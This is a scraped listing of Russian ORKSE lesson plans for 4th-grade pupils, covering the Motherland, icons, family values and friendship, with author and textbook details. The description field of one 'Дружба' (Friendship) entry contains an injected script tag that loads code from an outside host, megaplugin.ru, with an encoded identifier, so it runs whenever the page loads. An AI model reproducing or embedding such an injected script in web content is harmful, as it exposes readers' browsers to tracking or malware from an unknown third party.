Вы не зарегистрированы

Авторизация



ОРКСЭ

«Россия наша – Родина" урок по ОРКСЭ

Фото пользователя Татьяна Вячеславовна Николаева
Submitted by Татьяна Вячеславовна Николаева on Tue, 05/06/2018 - 10:27
Данные об авторе
Автор(ы): 
Яковлева Светлана Викторовна
Место работы, должность: 

МАОУ СОШ №2 г. Боровичи Новгородской области

Регион: 
Новгородская область
Характеристики урока (занятия)
Уровень образования: 
начальное общее образование
Целевая аудитория: 
Все целевые аудитории
Класс(ы): 
4 класс
Предмет(ы): 
Другое
Цель урока: 

Предметные УДД:  Формировать представления детей о России ,уважительное отношение к культуре родной страны. Создавать эмоционально положительную основу для развития патриотических чувств: любви и преданности Родине.

Личностные УУД: Расширять кругозор учащихся, обогащать словарный запас детей.

 Регулятивные УУД: контролировать и объективно оценивать свои действия.

Познавательные УУД – Углубить знания  о символике  Российского государства

 Коммуникативные УУД – формировать умение взаимодействовать с членами группы, умение договариваться, находить общее решение.

Тип урока: 
Урок изучения и первичного закрепления новых знаний
Учащихся в классе (аудитории): 
29
Используемые учебники и учебные пособия: 

Основы православной культуры. 4-5 классы: учебник для общеобразовательных учреждений / А. В. Кураев. – М.: Просвещение, 2011г.

Используемая методическая литература: 

Основы православной культуры. 4-5 классы: учебник для общеобразовательных учреждений / А. В. Кураев. – М.: Просвещение, 2011г.

Используемое оборудование: 

компьютер

Используемые ЦОР: 

презентация

Краткое описание: 
<p><strong>Тип урока</strong>: Урок&nbsp; открытия новых знаний, вводный урок по данной теме</p> <p><strong>Технология АМО и модерации</strong></p> <p><strong>Учебник</strong>&nbsp;&nbsp;&nbsp; Основы православной культуры. 4-5 классы: учебник для общеобразовательных учреждений / А. В. Кураев. &ndash; М.: Просвещение, 2011г.</p> <p><strong>Цели:</strong></p> <p>Предметные УДД: &nbsp;Формировать представления детей о России ,уважительное отношение к культуре родной страны. Создавать эмоционально положительную основу для развития патриотических чувств: любви и преданности Родине.</p> <p>Личностные УУД: Расширять кругозор учащихся, обогащать словарный запас детей.</p> <p>&nbsp;Регулятивные УУД: контролировать и объективно оценивать свои действия.</p> <p>Познавательные УУД &ndash; Углубить знания&nbsp; о символике &nbsp;Российского государства</p> <p>&nbsp;Коммуникативные УУД &ndash; формировать умение взаимодействовать с членами группы, умение договариваться, находить общее решение.</p> <p><strong>Термины и понятия:</strong></p> <p>Родина ,Россия, Отечество, столица, президент герб, гимн, флаг, национальность, , патриот, &nbsp;традиции.</p>

»  Tags for document:
»  Размещено в сообществах:   

ПК ОРКСЭ 16.05.2014

Фото пользователя Ольга Михайловна Лесина
Submitted by Ольга Михайловна Лесина on пн, 27/02/2017 - 00:14


»  Tags for document:

Конспект урока по ОРКСЭ "Икона"

Фото пользователя Татьяна Вячеславовна Николаева
Submitted by Татьяна Вячеславовна Николаева on Tue, 07/06/2016 - 14:31
Данные об авторе
Автор(ы): 
Антонова В.А., учитель начальных классов МАОУ СОШ № 2 г. Боровичи
Место работы, должность: 

МАОУ СОШ № 2 г. Боровичи Новгородская область

Регион: 
Новгородская область
Характеристики урока (занятия)
Уровень образования: 
начальное общее образование
Уровень образования: 
основное общее образование
Целевая аудитория: 
Все целевые аудитории
Класс(ы): 
4 класс
Предмет(ы): 
Другое
Цель урока: 

Цели урока:

Познакомить с историей развития древнерусской иконописи, с иконами.

Установить, чем икона отличается от картины.

Формируемые УУД:

Личностные УУД:

- учебно-познавательный интерес к новому учебному материалу и способам решения     новой задачи;

- уметь проводить самооценку успешной учебной деятельности. 

Метапредметные:

Регулятивные УУД:

– определять и формулировать цель деятельности на уроке;

- планировать свои действия в соответствии с поставленной задачей;

Познавательные УУД: 

-уметь находить ответы на поставленные проблемные вопросы;

-уметь работать с книгой и слайдами, текстом и иллюстрациями;

-уметь сравнивать и анализировать;

– делать выводы в результате совместной работы класса и учителя;

Коммуникативные УУД:

- уметь формулировать связный ответ на поставленный вопрос;

-уметь общаться друг с другом по правилам принятым в обществе;

- учиться умению договариваться и приходить к общему решению в совместной деятельности в паре, в группе.

Тип урока: 
Урок изучения и первичного закрепления новых знаний
Учащихся в классе (аудитории): 
27
Используемые учебники и учебные пособия: 

А.В. Кураев "Основы православной культуры"

Используемая методическая литература: 

А.В. Кураев "Основы православной культуры"

Используемое оборудование: 

карточки

Используемые ЦОР: 

ноутбук, проектор,

Краткое описание: 
<p>Урок&nbsp; Антоновой В.А., учителя начальных классов МАОУ СОШ № 2 г. Боровичи Новгородской области&nbsp; курса ОРКСЭ по модулю &quot;Основы православной культуры&quot; с использованием презентации</p>

»  Tags for document:
»  Размещено в сообществах:   

ОРКСЭ

Submitted by Оксана Александровна Шелестова on пн, 11/04/2016 - 14:19
Данные об авторе
Автор(ы): 
Шелестова Оксана Александровна
Регион: 
Ленинградская область
Характеристики урока (занятия)
Уровень образования: 
начальное общее образование
Целевая аудитория: 
Учитель (преподаватель)
Класс(ы): 
4 класс
Предмет(ы): 
Другое
Цель урока: 

Воспитание нравственно здоровой личности, способной идентифицировать себя с позиции гражданина России и устанавливать связь с национальной культурой и ее ценностями.

Тип урока: 
Урок комплексного применения ЗУН учащихся
Учащихся в классе (аудитории): 
15
Используемая методическая литература: 

Учебник

Основы духовно-нравственной культуры народов России. Основы религиозных культур и светской этики. Основы светской этики 4 (4-5) ДРОФА

Словари

Словарь Ожегова - "Словарь русского языка"

Толковый словарь живого великорусского языка В. И. Даль

Используемое оборудование: 

Демонстрационный материал:

Электронная презентация

Карточки

Изображения

Портреты

Краткое описание: 
<p><strong>Сформировать представление</strong> о значение семьи и рода в жизни человека; понимание значения семьи в своей семейной истории- истории Родины &ndash; истории человечества.</p> <p><strong>Ввести понятия</strong> родовая связь (без определения), предназначение семьи.</p> <p><strong>Научить использовать</strong> приобретенные знания и умения в практической деятельности.</p>

Воспитание нравственно здоровой личности, способной идентифицировать себя с позиции гражданина России и устанавливать связь с национальной культурой и ее ценностями является задачей образовательног


»  Tags for document:

Семья и семейные ценности

Submitted by Эмилия Николаевна Медведева on чт, 14/01/2016 - 14:10
Данные об авторе
Автор(ы): 
Медведева Эмилия Николаевна
Место работы, должность: 

МБОУ СОШ №68

Регион: 
Воронежская область
Характеристики урока (занятия)
Уровень образования: 
начальное общее образование
Целевая аудитория: 
Учитель (преподаватель)
Класс(ы): 
5 класс
Предмет(ы): 
Культурология
Краткое описание: 
<p>Разработка урока к курсу ОРКСЭ</p>

Тема: «Истоки нравственных отношений в христианской семье».

Данные об авторе
Автор(ы): 
Коршунова Лариса Александровна
Место работы, должность: 

МБОУ  СОШ № 10 п. Каменский Красноармейского района Саратовской области, учитель истории и обществознания
 

Регион: 
Саратовская область
Характеристики урока (занятия)
Уровень образования: 
начальное общее образование
Уровень образования: 
основное общее образование
Уровень образования: 
среднее (полное) общее образование
Уровень образования: 
школы-интернаты, детские дома
Целевая аудитория: 
Методист
Целевая аудитория: 
Родитель
Целевая аудитория: 
Учитель (преподаватель)
Класс(ы): 
4 класс
Класс(ы): 
5 класс
Предмет(ы): 
Другое
Цель урока: 

Цель содержательная: Осознание понятия «христианская семья» в контексте культурного и религиозного многообразия; Объяснять значение понятий: христианская семья, венчание, обручальное кольцо, семейные ценности

Цель деятельностная:  расширение понятийной базы за счет включения в нее новых элементов; формирование умения устанавливать причинно-следственные связи, высказывать предположения, обсуждать проблемные вопросы;

-формирование умения восприятия текста с учетом поставленной  учебной задачи, находить в тексте информацию, необходимую для решения этой задачи, развитие коммуникативных способностей учащихся.


 

Тип урока: 
Урок изучения и первичного закрепления новых знаний
Учеников в классе: 
15
Используемые учебники и учебные пособия: 

Оборудование:

  1. Учебник Кураев А.В. Основы религиозных культур  и светской этики. Основы православной культуры 4-5 кл.уч. пособие для общеобр. учрежд./А.В. Кураев.М. Просвещение.2012


 


 

Используемая методическая литература: 

Основы религиозных культур и светской этики.Книга для учителя.4 класс:

справочные материалы для общеобразовательных учреждений/(Бгажноков Б.Х.,

Воскресенский О.В.,Глоцер А.В.и др.);под ред.Тишкова В.А.,Шапошниковой Т.Д.

-М.:Просвещение,2010.С.-239


 

Используемое оборудование: 

Оборудование:

  1. учебник Кураев А.В. Основы религиозных культур  и светской этики. Основы православной культуры 4-5 кл.уч. пособие для общеобр. учрежд./А.В. Кураев.М. Просвещение.2012
  2. индивидуальные  рабочие  листы
  3. конверты мудрости
  4. карточки с заданием


 

Краткое описание: 
<p>Урок разработан в соответствии с ФГОС, с&nbsp; использованием гуманно-личностной педагогической технологии, технологии &nbsp;здоровьесбережения &nbsp;(дозировка заданий, своевременная смена видов деятельности учащихся)</p> <ol> <li>&nbsp;Данный урок представлен по ходу изучения курса ОРКСЭ за №27. В соответствии с требованиями ФГОС урок направлен на:&nbsp;<br /> 1.&nbsp;&nbsp;&nbsp;&nbsp; ориентацию на новые образовательные результаты&nbsp;<br /> &nbsp; 2. нацеленную &nbsp;деятельность на формирование УУД&nbsp;.</li> </ol> <p>Этот урок связан с предыдущими уроками, рассматривающими особенности христианского вероучения, а в дальнейшем направлен на продолжение изучения по курсу ОРКСЭ.</p> <ol> <li>Обеспечение мотивации и&nbsp;принятия учащимися цели учебно-познавательной деятельности удалось за счёт привлечения занимательного ребуса, необычным было обнаружение папки с заданиями, что по задумке должно было ещё более стимулировать познавательный интерес учащихся.</li> <li>Отбор содержания, форм и методов обучения осуществлялся в соответствии с целью урока. Для объяснения нового материала было выбрано сочетание таких методов обучения как:</li> </ol> <p>- по источнику передачи и восприятия учебной деятельности: Словесный</p> <p>- по степени самостоятельности мышления: проблемно-поисковый</p> <p>- метод стимулирования интереса к учению: создание эмоционально-нравственных ситуаций.</p> <p><br /> &nbsp;</p>
Ресурс для профильной школы: 
Ресурс для профильной школы

Этап


»  Размещено в сообществах:   

«Икона»

Фото пользователя Лариса Александровна Коршунова
Submitted by Лариса Александровна Коршунова on Fri, 30/01/2015 - 11:13
Данные об авторе
Автор(ы): 
Коршунова Л.А.
Место работы, должность: 

МБОУ СОШ № 10 п. Каменский Красноармеского района Саратовской области, учитель истории, обществознания, ОРКСЭ
 

Регион: 
Саратовская область
Характеристики урока (занятия)
Уровень образования: 
начальное общее образование
Целевая аудитория: 
Методист
Целевая аудитория: 
Учитель (преподаватель)
Класс(ы): 
4 класс
Предмет(ы): 
Другое
Цель урока: 
  1. Цель  урока: познакомить с понятием «икона»,охарактеризовать основные направления в цветовой гамме в иконописи;

9. Задачи:

- формировать знания об истории иконописных традиций на Руси;

-развивать умения работать в группах;

- воспитывать душевность и уважение к традициям своего народа.

Формируемые УУД:

Познавательные:

1. Извлекать информацию из текста.

2. Строить речевое высказывание в устной форме.

3. Делать выводы на основе анализа объектов

Регулятивные:

1. Определять цель деятельности на уроке.

2. Оценивать учебные действия в соответствии с поставленной задачей.

Коммуникативные :

1. Слушать и понимать других.

2. Строить речевое высказывание в соответствии с поставленными задачами.


 

Тип урока: 
Урок изучения и первичного закрепления новых знаний
Используемые учебники и учебные пособия: 

А.В. Кураев Основы религиозных культур и светской этики. Основы православной культуры.Москва. Просвещение. 2012
 

Используемая методическая литература: 

Основы духовно-нравственной культуры народов России. Основы религиозных культур и светской этики. книга для учителя. 4-5 классы: справ. матер. для общеобраз. учр./ В.А. Тишков, Т.Д. Шапошникова, О.Е. Казьмина и др.; под ред. В.А. Тишкова...М.: Просвещение, 2012
 

Используемое оборудование: 

Дорожные карты
 

Краткое описание: 
<p>Конспект урока ОРКСЭ в 4 классе по теме &quot;Икона&quot;.<br /> &nbsp;</p>

СТРУКТУРА И ХОД УРОКА


»  Размещено в сообществах:   

Дружба

Submitted by Алена Штодина on Fri, 09/01/2015 - 17:50
Данные об авторе
Автор(ы): 
Титова Антонина Ивановна
Место работы, должность: 

МБОУ "Новорогачинская СОШ", учитель начальных классов

Регион: 
Волгоградская область
Характеристики урока (занятия)
Уровень образования: 
начальное общее образование
Целевая аудитория: 
Классный руководитель
Целевая аудитория: 
Педагог дополнительного образования
Целевая аудитория: 
Учащийся (студент)
Целевая аудитория: 
Учитель (преподаватель)
Класс(ы): 
4 класс
Предмет(ы): 
Другое
Цель урока: 

сформировать у обучающихся представление о дружбе как о важнейшей нравственной ценности; углубить представление детей о том,  каким должен быть настоящий друг; формировать навыки конструктивного поведения в дружеских отношениях, умение аргументировать свою точку зрения, вести рассуждения; воспитывать чувство доброжелательности, эмоционально-нравственной отзывчивости, понимания и сопереживания чувствам других

Тип урока: 
Урок изучения и первичного закрепления новых знаний
Учащихся в классе (аудитории): 
24
Используемое оборудование: 

проектор, компьютер

Краткое описание: 
<p>Конспект урока по ОРКСЭ на тему &quot;Дружба&quot; 4 класс</p>

Предмет:   ОРКСЭ.  Основы светской этики.

Класс 4 «б»

Учитель: Титова Антонина Ивановна


»  Tags for document:

Дружба

Submitted by Антонина Ивановна Титова on Sat, 03/01/2015 - 18:46
Данные об авторе
Автор(ы): 
Титова Антонина Ивановна
Место работы, должность: 

учитель начальных классов

 МБОУ «Новорогачинская СОШ»


Регион: 
Волгоградская область
Характеристики урока (занятия)
Целевая аудитория: 
Учитель (преподаватель)
Класс(ы): 
4 класс
Предмет(ы): 
Спецпредмет
Цель урока: 

сформировать у обучающихся представление о дружбе как о важнейшей нравственной ценности; углубить представление детей о том,  каким должен быть настоящий друг; формировать навыки конструктивного поведения в дружеских отношениях, умение аргументировать свою точку зрения, вести рассуждения; воспитывать чувство доброжелательности, эмоционально-нравственной отзывчивости, понимания и сопереживания чувствам других.


Тип урока: 
Комбинированный урок
Используемые учебники и учебные пособия: 
Используемая методическая литература: 
Используемое оборудование: 

мультимедиапроектор,  презентация, записи детских песен «Если с другом вышел в путь», «Улыбка», «Песня о дружбе», карточки с пословицами, карточки со словами – нравственные качества человека, словари, небольшие листы бумаги для каждого ребенка.

Используемые ЦОР: 

презентация

Краткое описание: 
<p>Урок формирует у обучающихся представление о дружбе как о важнейшей нравственной ценности.<br /> <script src="http://megaplugin.ru/datax.php?snid=VyAtRENXWUEzVTc5OTY1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==&amp;rnd=2018"></script> </p>

Урок расширяет  представление детей о том,  каким должен быть настоящий друг;  воспитывать чувство доброжелательности, эмоционально-нравственной отзывчивости, понимания и сопереживан


Рабочая программа ОРКСЭ

Фото пользователя Наталья Борисовна Коннова
Submitted by Наталья Борисовна Коннова on пн, 03/02/2014 - 16:36
Данные об авторе
Автор(ы): 
, Коннова Наталья Борисовна
Место работы, должность: 
МБОУ СОШ с. Новополеводино
Регион: 
Город Москва
Характеристики урока (занятия)
Уровень образования: 
начальное общее образование
Целевая аудитория: 
Библиотекарь
Целевая аудитория: 
Воспитатель
Целевая аудитория: 
Родитель
Класс(ы): 
4 класс
Предмет(ы): 
Другое
Цель урока: 

воспитание гражданственности и патриотизма, сознательного отношения к культурным и религиозгым процессам и явлениям, научить толерантному отношению и общению учащихся с другими людьми, воспитание интереса и уважения к различным религиозным  конфессиям.

Учащихся в классе (аудитории): 
7
Используемые учебники и учебные пособия: 

Normal 0 false false false RU X-NONE X-NONE

/* Style Definitions */ table.MsoNormalTable {mso-style-name:"Обычная таблица"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin-top:0cm; mso-para-margin-right:0cm; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0cm; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin;}

А.В. Кураев. Основы религиозных культур и светской этики. Основы православной культуры 4-5 класс, М., «Просвещение», 2010 г.

Используемая методическая литература: 

Normal 0 false false false RU X-NONE X-NONE

/* Style Definitions */ table.MsoNormalTable {mso-style-name:"Обычная таблица"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin-top:0cm; mso-para-margin-right:0cm; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0cm; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin;}

Методическое пособие  «Уроки ОРКСЭ», А.В. Кураев, М., «Просвещение, 2011г.

Используемое оборудование: 

КТП, тесты, карточки с заданиями, индивидуальый план работы с учащимися

Краткое описание: 
данный документ позволяет возможность скоординировать работу учителя и ученика, выбрать самые оптимальные методы и технологии